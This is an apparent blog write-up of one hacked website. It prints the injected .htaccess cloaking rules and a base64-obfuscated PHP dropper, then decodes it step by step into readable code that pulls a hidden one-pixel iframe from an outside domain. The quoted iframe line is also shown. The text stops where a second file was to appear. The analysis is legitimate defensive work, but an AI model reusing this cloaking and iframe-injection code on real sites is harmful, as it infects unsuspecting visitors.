
My little investigation, or the story of one hack

It all started with a message from a friend on one of the social networks: "Are you there? Yandex found viruses on the site. Will you take a look?" "Why not," I thought.
So began my three-day study of the scripts, to understand how the site was hacked and what was going on there.

Yandex's complaint was "behavioral analysis".
First of all I inspected .htaccess; these lines had been added at the top of the file:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
    RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
    RewriteCond %{REQUEST_FILENAME} !/index_backup.php
    RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
    </IfModule>

Everything is simple: every visitor who arrived at our site from a search engine, directory, etc. and is browsing with Opera or Internet Explorer is redirected to a certain index_backup.php page. A visitor who types the address directly (no referer) or uses another browser sees the normal site, which is why the owner never noticed anything.
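To see exactly who was cloaked and who was not, the three RewriteCond lines can be replayed against a request. This is an added example (not from the original post); REFERER_SOURCES is a short subset of the alternation in the real rule, and the sample user agents in the comments are constructed.

```python
"""Replays the injected .htaccess rules for one request, so the site owner can
check which visitors were redirected and which were not. Added example, not part
of the original post; REFERER_SOURCES is a subset of the real alternation."""
import re

# Subset of the (google|ask|yahoo|...) list in the rule. Note how broad some
# entries are: "web", "live", "search", "blog" and "about" match far more than
# search engines, so almost any referring site triggers the redirect.
REFERER_SOURCES = ["google", "yahoo", "yandex", "ya", "bing", "facebook",
                   "twitter", "live", "web", "search", "blog", "about"]

# (server variable, regex, negated) in the order the rules list them
CONDITIONS = [
    # RewriteCond %{HTTP_REFERER} ^.*(google|...)\.(.*)   -- no [NC]: case-sensitive
    ("HTTP_REFERER", re.compile(r"^.*(" + "|".join(REFERER_SOURCES) + r")\.(.*)"), False),
    # RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
    ("HTTP_USER_AGENT", re.compile(r"^.*(msie|opera)", re.IGNORECASE), False),
    # RewriteCond %{REQUEST_FILENAME} !/index_backup.php   -- negated, prevents a loop
    ("REQUEST_FILENAME", re.compile(r"/index_backup.php"), True),
]


def failed_conditions(referer, user_agent, request_path):
    """Names of the RewriteConds that do not hold; an empty list means the rule fires.
    request_path stands in for REQUEST_FILENAME (the negated check only needs the
    path). Apache applies the regex unanchored, hence search()."""
    values = {"HTTP_REFERER": referer or "", "HTTP_USER_AGENT": user_agent or "",
              "REQUEST_FILENAME": request_path}
    failed = []
    for name, pattern, negated in CONDITIONS:
        matched = pattern.search(values[name]) is not None
        if matched == negated:
            failed.append(name)
    return failed


def rewrite_target(referer, user_agent, request_path, query_string=""):
    """Return the rewritten URL, or None when any condition fails.
    RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]: in per-directory
    context $1 is the path without its leading slash; QSA appends the old query."""
    if failed_conditions(referer, user_agent, request_path):
        return None
    target = "/index_backup.php?query=" + request_path.lstrip("/")
    return target + ("&" + query_string if query_string else "")


if __name__ == "__main__":
    # constructed user agents: an IE visitor coming from Google vs. the owner typing the URL
    ie = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
    print(rewrite_target("http://www.google.com/search?q=site", ie, "/index.php"))
    print(failed_conditions("", ie, "/index.php"))
```

Yandex's "behavioral analysis" verdict comes from exactly this kind of replay: the crawler fetches the page once as itself and once imitating a search-engine referral with an IE user agent, and flags the site when the two responses differ.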
The content of index_backup.php is a single line. But what a line! (From here on, the code is hidden under spoilers so as not to clutter the post.)
file contents
 <? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRfY29'.'u'.'dGV'.'udHM'.'='),base64_decode('c3RyZ'.'WFtX'.'2Nvbn'.'RleHR'.'fY3JlYXR'.'l'),base64_decode(''.'Zml'.'sZV9nZ'.'X'.'RfY29'.'udGVudHM='),base64_decode('c3'.'R'.'ybmF0'.'Y21'.'w'),base64_decode('bXRfcmFuZ'.'A='.'='),base64_decode('ZnB1dHM='),base64_decode('ZnJlYWQ'.'='),base64_decode('ZmN'.'sb3N'.'l'),base64_decode('c3RycG9z'),base64_decode('YW'.'RkY3NsYX'.'N'.'oZXM='),base64_decode('Z'.'mZsdXNo'),base64_decode(''.'c3V'.'ic3Ry'),base64_decode('Zm'.'lsZV'.'9'.'nZXRfY29udGVu'.'dH'.'M='),base64_decode('YXJyY'.'XlfZm'.'lsbF9rZXlz'),base64_decode(''.'Y3Vyb'.'F9pbml0'),base64_decode('Y3VybF9tdWx0aV9leGVj'),base64_decode('YXJyY'.'Xlfc'.'HVzaA=='),base64_decode('Y3VybF9zZXRvc'.'HQ'.'='),base64_decode('bXRf'.'cmFuZ'.'A=='),base64_decode('aW1hZ'.'2VjcmVhdGVmcm9'.'tZ2lm'),base64_decode('Y3'.'Vy'.'bF9'.'zZX'.'RvcH'.'Q'.'='),base64_decode('Y3VybF9zZX'.'Rvc'.'HQ='),base64_decode('Y3'.'Vy'.'bF'.'9l'.'eG'.'Vj'),base64_decode('Y3'.'Vy'.'bF9jbG9z'.'Z'.'Q=='),base64_decode(''.'aW5pX2d'.'ldA='.'='),base64_decode('c'.'GFyc2VfdX'.'Js'),base64_decode('ZnNv'.'Y2tv'.'cGVu'),base64_decode('ZnV'.'uY3R'.'p'.'b'.'2'.'5f'.'Z'.'Xh'.'pc'.'3Rz')); ?><? 
function _1051993851($i){$a=Array('SUZ'.'SQU1FX1'.'V'.'S'.'T'.'A==','aH'.'R0c'.'DovL3d'.'vcmRwcmV'.'zc3Rlc3Qu'.'aW'.'5m'.'by83Ln'.'R4'.'d'.'A='.'=',''.'ZA==','aHR0cDovLw='.'=','S'.'F'.'RUU'.'F9IT1NU','Uk'.'VRVU'.'VTV'.'F'.'9VUkk'.'=','a'.'HR0'.'cA==','dGltZW91dA==','R'.'0VUIA==',''.'Pw='.'=','I'.'CB'.'IVFRQLzEuMA0K','VXNlci1BZ2VudDo'.'gTW96'.'a'.'WxsYS81L'.'jAgKFd'.'p'.'bmRvd3M7IFU7IFdpbmRvd'.'3MgT'.'lQgN'.'S4xO'.'yBl'.'b'.'i1V'.'UzsgcnY6MS44LjA'.'uMykgR2'.'Vj'.'a2'.'8v'.'MjAwNjA0'.'M'.'jYgRmlyZW'.'ZveC8x'.'LjUuM'.'C4zDQo=',''.'QW'.'NjZXB0'.'OiAqLyoNCg='.'=','QWNjZXB0'.'LUxhb'.'md1YWdlOiBlbi11cyxlbjt'.'xPTAuNQ0K','QWN'.'jZXB'.'0L'.'UNo'.'YXJz'.'ZX'.'Q6IElTTy04'.'ODU5LTEsdXR'.'mLTg7cT'.'0wLjcs'.'Kjt'.'xPTAu'.'Nw0K','S2VlcC'.'1'.'Bb'.'Gl'.'2'.'ZT'.'ogMzA'.'w'.'D'.'Qo=',''.'Q29'.'ubmVjd'.'Glv'.'bjoga'.'2Vl'.'cC1hbGl2ZQ0K','aQ==','DQoNC'.'g==','Y'.'Wxsb3df'.'dXJsX'.'2ZvcG'.'Vu','aG9zd'.'A==','aG9zd'.'A==','cGF0aA==','cXVl'.'c'.'nk=',''.'Y3VybF9pbm'.'l0');return base64_decode($a[$i]);} ?><?php $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));$_0=_1051993851(2);echo l__3(IFRAME_URL);$_1=round(0+2345.5+2345.5);echo@$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);function l__0($_2){$_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=> round(0+3+3+3+3+3))));return $GLOBALS['_62805507_'][3]($_2,false,$_3);(round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333),round(0+1266.3333333333+1266.3333333333+1266.3333333333));}function l__1($_5,$_6,$_7,$_8){$GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 ._1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: 
http://$_6\r\n\r\n");while($_4=$GLOBALS['_62805507_'][7]($_5,round(0+1365.3333333333+1365.3333333333+1365.3333333333))){$_9 .= $_4;}$GLOBALS['_62805507_'][8]($_5);$_10=_1051993851(17);$_11=$GLOBALS['_62805507_'][9]($_9,_1051993851(18));if((round(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);$_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&& $GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);return $_9;}function l__2($_2){$_13=$GLOBALS['_62805507_'][15]($_2);if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));else{$GLOBALS['_62805507_'][17]($_11);}$GLOBALS['_62805507_'][18]($_13,42,FALSE);if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);$GLOBALS['_62805507_'][21]($_13,19913,TRUE);$GLOBALS['_62805507_'][22]($_13,13,round(0+3+3+3+3+3));$_12=$GLOBALS['_62805507_'][23]($_13);$GLOBALS['_62805507_'][24]($_13);return $_12;}function l__3($_2){if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){echo l__0($_2);}else{$_14=$GLOBALS['_62805507_'][26]($_2);if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}} 

After adding line breaks the code became a bit more readable, but not one bit clearer:
contents of the edited file
    <?
    $GLOBALS['_62805507_']=Array(
        base64_decode('ZGVmaW5l'),
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),
        base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'),
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),
        base64_decode('c3RybmF0Y21w'),
        base64_decode('bXRfcmFuZA=='),
        base64_decode('ZnB1dHM='),
        base64_decode('ZnJlYWQ='),
        base64_decode('ZmNsb3Nl'),
        base64_decode('c3RycG9z'),
        base64_decode('YWRkY3NsYXNoZXM='),
        base64_decode('ZmZsdXNo'),
        base64_decode('c3Vic3Ry'),
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),
        base64_decode('YXJyYXlfZmlsbF9rZXlz'),
        base64_decode('Y3VybF9pbml0'),
        base64_decode('Y3VybF9tdWx0aV9leGVj'),
        base64_decode('YXJyYXlfcHVzaA=='),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('bXRfcmFuZA=='),
        base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('Y3VybF9zZXRvcHQ='),
        base64_decode('Y3VybF9leGVj'),
        base64_decode('Y3VybF9jbG9zZQ=='),
        base64_decode('aW5pX2dldA=='),
        base64_decode('cGFyc2VfdXJs'),
        base64_decode('ZnNvY2tvcGVu'),
        base64_decode('ZnVuY3Rpb25fZXhpc3Rz'));
    ?>
    <?
    function _1051993851($i){
        $a=Array(
            'SUZSQU1FX1VSTA==',
            'aHR0cDovL3dvcmRwcmVzc3Rlc3QuaW5mby83LnR4dA==',
            'ZA==',
            'aHR0cDovLw==',
            'SFRUUF9IT1NU',
            'UkVRVUVTVF9VUkk=',
            'aHR0cA==',
            'dGltZW91dA==',
            'R0VUIA==',
            'Pw==',
            'ICBIVFRQLzEuMA0K',
            'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=',
            'QWNjZXB0OiAqLyoNCg==',
            'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K',
            'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K',
            'S2VlcC1BbGl2ZTogMzAwDQo=',
            'Q29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0K',
            'aQ==',
            'DQoNCg==',
            'YWxsb3dfdXJsX2ZvcGVu',
            'aG9zdA==',
            'aG9zdA==',
            'cGF0aA==',
            'cXVlcnk=',
            'Y3VybF9pbml0');
        return base64_decode($a[$i]);
    }
    ?>
    <?php
    $GLOBALS['_62805507_'][0](_1051993851(0),_1051993851(1));
    $_0=_1051993851(2);
    echo l__3(IFRAME_URL);
    $_1=round(0+2345.5+2345.5);
    echo@$GLOBALS['_62805507_'][1](_1051993851(3) .$_SERVER[_1051993851(4)] .$_SERVER[_1051993851(5)]);
    function l__0($_2){
        $_3=$GLOBALS['_62805507_'][2](array(_1051993851(6)=> array(_1051993851(7)=> round(0+3+3+3+3+3))));
        return $GLOBALS['_62805507_'][3]($_2,false,$_3);
        (round(0+3799)-round(0+759.8+759.8+759.8+759.8+759.8)+round(0+3457)-round(0+3457))?$GLOBALS['_62805507_'][4]($_4,$_3):$GLOBALS['_62805507_'][5](round(0+767.33333333333+767.33333333333+767.33333333333),round(0+1266.3333333333+1266.3333333333+1266.3333333333));
    }
    function l__1($_5,$_6,$_7,$_8){
        $GLOBALS['_62805507_'][6]($_5,_1051993851(8) .$_7 ._1051993851(9) .$_8 ._1051993851(10) ."Host: $_6\r\n" ._1051993851(11) ._1051993851(12) ._1051993851(13) ._1051993851(14) ._1051993851(15) ._1051993851(16) ."Referer: http://$_6\r\n\r\n");
        while($_4=$GLOBALS['_62805507_'][7]($_5,round(0+1365.3333333333+1365.3333333333+1365.3333333333))){
            $_9 .= $_4;
        }
        $GLOBALS['_62805507_'][8]($_5);
        $_10=_1051993851(17);
        $_11=$GLOBALS['_62805507_'][9]($_9,_1051993851(18));
        if((round(0+968.25+968.25+968.25+968.25)^round(0+1291+1291+1291))&& $GLOBALS['_62805507_'][10]($_5,$_2,$_5,$_7))$GLOBALS['_62805507_'][11]($_12,$_7,$_11);
        $_9=$GLOBALS['_62805507_'][12]($_9,$_11+round(0+1.3333333333333+1.3333333333333+1.3333333333333));
        if((round(0+1014.5+1014.5+1014.5+1014.5)^round(0+4058))&& $GLOBALS['_62805507_'][13]($_3,$_3,$_3))$GLOBALS['_62805507_'][14]($_13);
        return $_9;
    }
    function l__2($_2){
        $_13=$GLOBALS['_62805507_'][15]($_2);
        if((round(0+736.6+736.6+736.6+736.6+736.6)+round(0+312+312+312))>round(0+3683)|| $GLOBALS['_62805507_'][16]($_14));
        else{
            $GLOBALS['_62805507_'][17]($_11);
        }
        $GLOBALS['_62805507_'][18]($_13,42,FALSE);
        if(round(0+3068.5+3068.5)<$GLOBALS['_62805507_'][19](round(0+572.33333333333+572.33333333333+572.33333333333),round(0+4415)))$GLOBALS['_62805507_'][20]($_2,$_15,$_16);
        $GLOBALS['_62805507_'][21]($_13,19913,TRUE);
        $GLOBALS['_62805507_'][22]($_13,13,round(0+3+3+3+3+3));
        $_12=$GLOBALS['_62805507_'][23]($_13);
        $GLOBALS['_62805507_'][24]($_13);
        return $_12;
    }
    function l__3($_2){
        if($GLOBALS['_62805507_'][25](_1051993851(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){
            echo l__0($_2);
        }else{
            $_14=$GLOBALS['_62805507_'][26]($_2);
            if($_5=@$GLOBALS['_62805507_'][27]($_14[_1051993851(20)],round(0+40+40),$_15,$_16,round(0+3+3+3+3+3))){
                echo l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);
            }elseif(@$GLOBALS['_62805507_'][28](_1051993851(24))){
                echo l__2($_2);
            }
        }
    }
    ?>

Time to decode the result. The base64 strings turn into ordinary PHP function names and string constants, and every round(0+a+b+...) sum is just an integer; the junk branches that never execute are marked:
file contents
    <?
    $GLOBALS['_62805507_']=Array(
        base64_decode('ZGVmaW5l'),                     // [0] => define
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),     // [1] => file_get_contents
        base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl'), // [2] => stream_context_create
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),     // [3] => file_get_contents
        base64_decode('c3RybmF0Y21w'),                 // [4] => strnatcmp
        base64_decode('bXRfcmFuZA=='),                 // [5] => mt_rand
        base64_decode('ZnB1dHM='),                     // [6] => fputs
        base64_decode('ZnJlYWQ='),                     // [7] => fread
        base64_decode('ZmNsb3Nl'),                     // [8] => fclose
        base64_decode('c3RycG9z'),                     // [9] => strpos
        base64_decode('YWRkY3NsYXNoZXM='),             // [10] => addcslashes
        base64_decode('ZmZsdXNo'),                     // [11] => fflush
        base64_decode('c3Vic3Ry'),                     // [12] => substr
        base64_decode('ZmlsZV9nZXRfY29udGVudHM='),     // [13] => file_get_contents
        base64_decode('YXJyYXlfZmlsbF9rZXlz'),         // [14] => array_fill_keys
        base64_decode('Y3VybF9pbml0'),                 // [15] => curl_init
        base64_decode('Y3VybF9tdWx0aV9leGVj'),         // [16] => curl_multi_exec
        base64_decode('YXJyYXlfcHVzaA=='),             // [17] => array_push
        base64_decode('Y3VybF9zZXRvcHQ='),             // [18] => curl_setopt
        base64_decode('bXRfcmFuZA=='),                 // [19] => mt_rand
        base64_decode('aW1hZ2VjcmVhdGVmcm9tZ2lm'),     // [20] => imagecreatefromgif
        base64_decode('Y3VybF9zZXRvcHQ='),             // [21] => curl_setopt
        base64_decode('Y3VybF9zZXRvcHQ='),             // [22] => curl_setopt
        base64_decode('Y3VybF9leGVj'),                 // [23] => curl_exec
        base64_decode('Y3VybF9jbG9zZQ=='),             // [24] => curl_close
        base64_decode('aW5pX2dldA=='),                 // [25] => ini_get
        base64_decode('cGFyc2VfdXJs'),                 // [26] => parse_url
        base64_decode('ZnNvY2tvcGVu'),                 // [27] => fsockopen
        base64_decode('ZnVuY3Rpb25fZXhpc3Rz'));        // [28] => function_exists
    ?>
    <?
    function _1051993851($i){
        $a=Array(
            'SUZSQU1FX1VSTA==',                               // [0] => IFRAME_URL
            'aHR0cDovL3dvcmRwcmVzc3Rlc3QuaW5mby83LnR4dA==',   // [1] => http://wordpresstest.info/7.txt
            'ZA==',                                           // [2] => d
            'aHR0cDovLw==',                                   // [3] => http://
            'SFRUUF9IT1NU',                                   // [4] => HTTP_HOST
            'UkVRVUVTVF9VUkk=',                               // [5] => REQUEST_URI
            'aHR0cA==',                                       // [6] => http
            'dGltZW91dA==',                                   // [7] => timeout
            'R0VUIA==',                                       // [8] => "GET "
            'Pw==',                                           // [9] => ?
            'ICBIVFRQLzEuMA0K',                               // [10] => "  HTTP/1.0\r\n"
            'VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuMykgR2Vja28vMjAwNjA0MjYgRmlyZWZveC8xLjUuMC4zDQo=', // [11] => User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n
            'QWNjZXB0OiAqLyoNCg==',                           // [12] => Accept: */*\r\n
            'QWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0K',   // [13] => Accept-Language: en-us,en;q=0.5\r\n
            'QWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0K', // [14] => Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
            'S2VlcC1BbGl2ZTogMzAwDQo=',                       // [15] => Keep-Alive: 300\r\n
            'Q29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0K',               // [16] => Connection: keep-alive\r\n
            'aQ==',                                           // [17] => i
            'DQoNCg==',                                       // [18] => "\r\n\r\n"
            'YWxsb3dfdXJsX2ZvcGVu',                           // [19] => allow_url_fopen
            'aG9zdA==',                                       // [20] => host
            'aG9zdA==',                                       // [21] => host
            'cGF0aA==',                                       // [22] => path
            'cXVlcnk=',                                       // [23] => query
            'Y3VybF9pbml0');                                  // [24] => curl_init
        return base64_decode($a[$i]);
    }
    ?>
    <?php
    define("IFRAME_URL", "http://wordpresstest.info/7.txt");
    $_0 = "d";   // junk
    // echo l__3(IFRAME_URL);
    $_1 = 4691;  // junk
    // then fetch and output the page the visitor actually asked for, so the site looks normal:
    // echo @file_get_contents("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);

    function l__0 ($iframeurl) {
        // method 1: file_get_contents (only works when allow_url_fopen is on)
        $socket_options = stream_context_create(array("http" => array("timeout" => 15)));
        return file_get_contents($iframeurl, false, $socket_options);
        // everything after the return is unreachable junk inserted by the obfuscator
        if (0){ strnatcmp($_4, $_3); } else { mt_rand(2302,3799); }
    }

    function l__1 ($socket, $host, $path, $query) {
        // method 2: a raw HTTP request over fsockopen, with a forged Firefox User-Agent
        fputs($socket, "GET ".$path."?".$query."  HTTP/1.0\r\n".
            "Host: $host\r\n".
            "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n".
            "Accept: */*\r\n".
            "Accept-Language: en-us,en;q=0.5\r\n".
            "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n".
            "Keep-Alive: 300\r\n".
            "Connection: keep-alive\r\n".
            "Referer: http://$host\r\n\r\n"
        );
        $response = "";
        while($buffer = fread($socket, 4096)) {
            $response .= $buffer;
        }
        fclose($socket);
        $_10 = "i"; // junk
        // the body starts after the first blank line; cut the HTTP headers off
        $header_end = strpos($response, "\r\n\r\n");
        // junk: the condition is always false
        if (0 && addcslashes($_5,$_2,$_5,$_7)){ fflush($_12,$_7,$_11); }
        $response = substr($response, $header_end + 4);
        // junk: the condition is always false
        if(0 && file_get_contents($_3,$_3,$_3)){ array_fill_keys($_13); }
        return $response;
    }

    function l__2 ($iframeurl) {
        // method 3: curl
        $curl = curl_init($iframeurl);
        // junk: 4619>3683 is always true, so the else branch never runs
        if (4619>3683 || curl_multi_exec($_14)); else { array_push($_11); }
        curl_setopt($curl, 42, FALSE);     // 42 = CURLOPT_HEADER: no headers in the result
        // junk: mt_rand(1717, 4415) can never exceed 6137
        if (6137 < mt_rand(1717, 4415)){ imagecreatefromgif($_2,$_15,$_16); }
        curl_setopt($curl, 19913, TRUE);   // 19913 = CURLOPT_RETURNTRANSFER
        curl_setopt($curl, 13, 15);        // 13 = CURLOPT_TIMEOUT, 15 seconds
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }

    function l__3 ($iframeurl) {
        // pick whichever transport the hosting allows
        if (ini_get("allow_url_fopen") == 1) {
            echo l__0($iframeurl);
        } else {
            $parsed = parse_url($iframeurl);
            if($socket = @fsockopen($parsed["host"], 80, $garbage_variable1, $garbage_variable2, 15)) {
                echo l__1($socket, $parsed["host"], $parsed["path"], $parsed["query"]);
            } elseif (@function_exists("curl_init")) {
                echo l__2($iframeurl);
            }
        }
    }
    ?>

And strip everything unnecessary:

    <?php
    define("IFRAME_URL", "http://wordpresstest.info/7.txt");
    echo l__3(IFRAME_URL);
    // serve the page the visitor originally requested, so the site looks untouched
    echo @file_get_contents("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);

    function l__0 ($iframeurl) {
        // method 1: file_get_contents
        $socket_options = stream_context_create(array("http" => array("timeout" => 15)));
        return file_get_contents($iframeurl, false, $socket_options);
    }

    function l__1 ($socket, $host, $path, $query) {
        // method 2: a raw HTTP request over fsockopen
        fputs($socket, "GET ".$path."?".$query."  HTTP/1.0\r\n".
            "Host: $host\r\n".
            "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n".
            "Accept: */*\r\n".
            "Accept-Language: en-us,en;q=0.5\r\n".
            "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n".
            "Keep-Alive: 300\r\n".
            "Connection: keep-alive\r\n".
            "Referer: http://$host\r\n\r\n"
        );
        $response = "";
        while($buffer = fread($socket, 4096)) {
            $response .= $buffer;
        }
        fclose($socket);
        $header_end = strpos($response, "\r\n\r\n");
        $response = substr($response, $header_end + 4);
        return $response;
    }

    function l__2 ($iframeurl) {
        // method 3: curl
        $curl = curl_init($iframeurl);
        curl_setopt($curl, 42, FALSE);     // CURLOPT_HEADER
        curl_setopt($curl, 19913, TRUE);   // CURLOPT_RETURNTRANSFER
        curl_setopt($curl, 13, 15);        // CURLOPT_TIMEOUT
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }

    function l__3 ($iframeurl) {
        // pick whichever transport the hosting allows
        if (ini_get("allow_url_fopen") == 1) {
            echo l__0($iframeurl);
        } else {
            $parsed = parse_url($iframeurl);
            if($socket = @fsockopen($parsed["host"], 80, $garbage_variable1, $garbage_variable2, 15)) {
                echo l__1($socket, $parsed["host"], $parsed["path"], $parsed["query"]);
            } elseif (@function_exists("curl_init")) {
                echo l__2($iframeurl);
            }
        }
    }
    ?>

From the code it is clear that the script tries, in every available way (one of the three offered), to fetch the data located at wordpresstest.info/7.txt (browsers and antivirus software may complain when you visit it). That page contains only one line: a one-pixel invisible frame whose address changes once a minute.
 <iframe src="http://raynesparkcarbootsale.co.uk/vmyehem.php" width=1 height=1 style="visibility: hidden"></iframe> 

When you go to that address, you see a white screen with two characters (1z / 2z / 3z / 4z), which change depending on the browser and operating system used.

Realizing that the address was constantly changing, I wrote a small script that once a minute (from cron) polled the 7.txt file, took the site address from it and wrote it to a database.
A few hours later my impudent "DDoS" was apparently noticed and my script's access was blocked. But it had managed to collect about 400 addresses, which turned out to be about 20-30 domains in the .ru zone.
Getting to this point was not hard: decoding the code was slow, but not difficult. What next? I have no access to the servers hosting the sites linked from the 7.txt file. What do you do when there is no access? You ask! Or at least try to persuade the owner to hand over the script the frame points to.
This step turned out to be the hardest: explaining to a site owner that I did not hack his site, I am not trying to sell him anything, this is not my creation and I did not encode any of his personal data. I just want to figure it out...
In the end one of the site owners agreed to send me the file, hoping it would not have any negative effect on him. My thanks to him for that!
the contents of the second file
